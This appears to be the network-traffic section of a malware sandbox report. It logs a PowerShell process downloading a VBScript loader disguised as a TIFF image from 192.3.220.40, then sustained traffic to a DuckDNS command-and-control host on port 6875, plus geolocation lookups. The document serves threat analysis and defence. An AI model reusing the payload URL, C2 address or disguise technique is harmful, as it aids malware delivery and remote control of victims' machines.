Oct 14, 2024 11:36:17.449407101 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.449431896 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.449457884 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.449498892 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.449517965 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.449539900 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.449547052 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.449565887 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.449570894 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.449590921 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.449624062 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.477785110 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.477797985 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.477819920 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.477833033 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.477833033 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.477874041 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.477889061 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.477900982 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.477906942 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.477917910 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.477922916 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.477946997 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.478018999 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.478041887 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.478056908 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.478070974 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.478077888 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.478086948 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.478106022 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.478120089 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.478529930 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.478598118 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.478657961 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.478671074 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.478686094 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.478694916 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.478701115 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.478720903 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.478732109 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.478882074 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.478935957 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.478950024 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.478971958 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.479015112 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.479029894 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.479063034 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.479104996 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.479119062 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.479132891 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.479146004 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.479151964 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.479161978 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.479165077 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.479197025 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.479690075 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.479703903 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.479718924 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.479753971 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.479763985 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.479779959 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.479794025 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.479800940 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.479810953 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.479831934 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.486020088 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486033916 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486047983 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486063004 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486071110 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.486079931 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486094952 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486114025 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.486129045 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486143112 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486154079 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.486181021 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.486331940 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486375093 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.486382008 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486397982 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486433029 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.486459017 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486474037 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486489058 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486501932 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486510992 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.486541986 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.486835003 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486876011 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486890078 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486906052 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486918926 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.486944914 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.486958981 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.487183094 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.487198114 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.487212896 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.487226963 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.487236977 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.487242937 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.487257004 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.487278938 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.487279892 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.487294912 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.487308979 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.487346888 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.487787008 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.487828016 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.487829924 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.487842083 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.487879992 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.487889051 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.487904072 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.487919092 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.487931967 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.487938881 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.487948895 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.487978935 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.494838953 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.494863033 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.494936943 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.494957924 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.494971991 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.494986057 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.494999886 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.495013952 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.495028019 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.495043039 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.495064974 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.495079041 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.495093107 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.495104074 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.495105982 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.495130062 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.495142937 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.495157003 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.495171070 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.495184898 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.495208979 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.495305061 CEST  49722  6875  192.168.2.5  135.148.195.248
Oct 14, 2024 11:36:17.495862007 CEST  6875  49722  135.148.195.248  192.168.2.5
Oct 14, 2024 11:36:17.495912075 CEST  6875  49722  135.148.195.248  192.168.2.5
                                                              Oct 14, 2024 11:36:17.495975971 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.495976925 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.495990992 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496015072 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496027946 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496042013 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496054888 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496062040 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.496160984 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.496340990 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496355057 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496368885 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496412992 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.496434927 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496448994 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496463060 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496474981 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.496484041 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496499062 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496510029 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.496515036 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496531010 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.496552944 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.496654987 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.538552046 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.538569927 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.538585901 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.538609982 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.538625956 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.538640976 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.538655996 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.538672924 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.538721085 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.566864967 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.566926003 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.566941023 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.566950083 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.566992044 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567004919 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567018986 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567025900 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567125082 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.567125082 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.567183971 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567198038 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567212105 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567224979 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567231894 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567236900 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.567253113 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567266941 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567281008 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567284107 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.567296982 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567311049 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567315102 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.567325115 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567339897 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567339897 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.567353964 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567364931 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.567368984 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.567428112 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.567429066 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.568013906 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.568028927 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.568051100 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.568063974 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.568084955 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.568092108 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.568099976 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.568114996 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.568125963 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.568144083 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.574858904 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:17.574927092 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:17.899461985 CEST8049723178.237.33.50192.168.2.5
                                                              Oct 14, 2024 11:36:17.899538040 CEST4972380192.168.2.5178.237.33.50
                                                              Oct 14, 2024 11:36:18.836263895 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:18.841316938 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.841334105 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.841356039 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.841367006 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.841387987 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.841399908 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.841412067 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:18.841412067 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:18.841419935 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.841433048 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.841470003 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.841480970 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.846314907 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.846328020 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.846426010 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.846446991 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.846483946 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.846494913 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.846832991 CEST687549722135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:18.846889019 CEST497226875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:36.755186081 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:36:36.756551027 CEST497146875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:36:36.761343956 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:37:06.770121098 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:37:06.771374941 CEST497146875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:37:06.776410103 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:37:36.772552013 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:37:36.773931980 CEST497146875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:37:36.778897047 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:38:06.277985096 CEST4972380192.168.2.5178.237.33.50
                                                              Oct 14, 2024 11:38:06.598278046 CEST4972380192.168.2.5178.237.33.50
                                                              Oct 14, 2024 11:38:06.788789988 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:38:06.790429115 CEST497146875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:38:06.795253038 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:38:07.279362917 CEST4972380192.168.2.5178.237.33.50
                                                              Oct 14, 2024 11:38:08.480937958 CEST4972380192.168.2.5178.237.33.50
                                                              Oct 14, 2024 11:38:10.980966091 CEST4972380192.168.2.5178.237.33.50
                                                              Oct 14, 2024 11:38:15.887182951 CEST4972380192.168.2.5178.237.33.50
                                                              Oct 14, 2024 11:38:25.513298035 CEST4972380192.168.2.5178.237.33.50
                                                              Oct 14, 2024 11:38:36.792798996 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:38:36.801995039 CEST497146875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:38:36.806873083 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:39:06.794198036 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:39:06.795279026 CEST497146875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:39:06.800163031 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:39:36.810085058 CEST687549714135.148.195.248192.168.2.5
                                                              Oct 14, 2024 11:39:36.814573050 CEST497146875192.168.2.5135.148.195.248
                                                              Oct 14, 2024 11:39:36.819413900 CEST687549714135.148.195.248192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 14, 2024 11:36:07.399461985 CEST | 62004 | 53 | 192.168.2.5 | 1.1.1.1
Oct 14, 2024 11:36:07.406614065 CEST | 53 | 62004 | 1.1.1.1 | 192.168.2.5
Oct 14, 2024 11:36:14.594326019 CEST | 50034 | 53 | 192.168.2.5 | 1.1.1.1
Oct 14, 2024 11:36:15.334422112 CEST | 53 | 50034 | 1.1.1.1 | 192.168.2.5
Oct 14, 2024 11:36:16.271738052 CEST | 50272 | 53 | 192.168.2.5 | 1.1.1.1
Oct 14, 2024 11:36:16.279804945 CEST | 53 | 50272 | 1.1.1.1 | 192.168.2.5
Oct 14, 2024 11:36:29.062748909 CEST | 53377 | 53 | 192.168.2.5 | 1.1.1.1
Oct 14, 2024 11:36:29.073044062 CEST | 53 | 53377 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 14, 2024 11:36:07.399461985 CEST | 192.168.2.5 | 1.1.1.1 | 0x53dc | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:36:14.594326019 CEST | 192.168.2.5 | 1.1.1.1 | 0xd9c8 | Standard query (0) | idabo.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:36:16.271738052 CEST | 192.168.2.5 | 1.1.1.1 | 0xbeda | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:36:29.062748909 CEST | 192.168.2.5 | 1.1.1.1 | 0x9180 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 14, 2024 11:36:07.406614065 CEST | 1.1.1.1 | 192.168.2.5 | 0x53dc | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:36:07.406614065 CEST | 1.1.1.1 | 192.168.2.5 | 0x53dc | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:36:07.406614065 CEST | 1.1.1.1 | 192.168.2.5 | 0x53dc | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:36:07.406614065 CEST | 1.1.1.1 | 192.168.2.5 | 0x53dc | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:36:15.334422112 CEST | 1.1.1.1 | 192.168.2.5 | 0xd9c8 | No error (0) | idabo.duckdns.org | | 135.148.195.248 | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:36:16.279804945 CEST | 1.1.1.1 | 192.168.2.5 | 0xbeda | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:36:29.073044062 CEST | 1.1.1.1 | 192.168.2.5 | 0x9180 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                              • raw.githubusercontent.com
                                                              • 192.3.220.40
                                                              • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49706 | 192.3.220.40 | 80 | 3812 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 14, 2024 11:36:01.371876001 CEST | 312 | OUT | GET /450/seethebestpricewithgoodcookiesme.tIF HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 192.3.220.40
Connection: Keep-Alive
Oct 14, 2024 11:36:01.847358942 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 14 Oct 2024 09:36:01 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Mon, 14 Oct 2024 05:12:43 GMT
ETag: "2fcf0-62468e2fb0efb"
Accept-Ranges: bytes
Content-Length: 195824
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff
Data Ascii: private function almecegueira(fluctuador, desvariar, miliciano, moansa, hemiatrophia) dim filter dim dialect dim e dim res dim formattedText dim flags flags = 0 if miliciano.ArgumentExists(NPARA_FILTER) then filter = miliciano.Argument(NPARA_FILTER) dialect = URI_WQL_DIALECT end if if miliciano.ArgumentExists(NPARA_DIALECT) then dialect = miliciano.Argument(NPAR
Oct 14, 2024 11:36:01.847428083 CEST | 1236 | IN | Data Ascii: A_DIALECT) end if If LCase(dialect) = "selector" Then dialect = "http://schemas.dmtf.org/wbem/ws
Oct 14, 2024 11:36:01.847465038 CEST | 448 | IN | Data Ascii: filter & "<wsman:Selector Name='" & Escape(name) & "'>" & Escape(value) & "</wsman:Selector>" Next fil
Oct 14, 2024 11:36:01.847503901 CEST | 1236 | IN | Data Ascii: = "http://schemas.microsoft.com/wbem/wsman/1/WQL" End If If LCase(dialect) = "association" Then dial
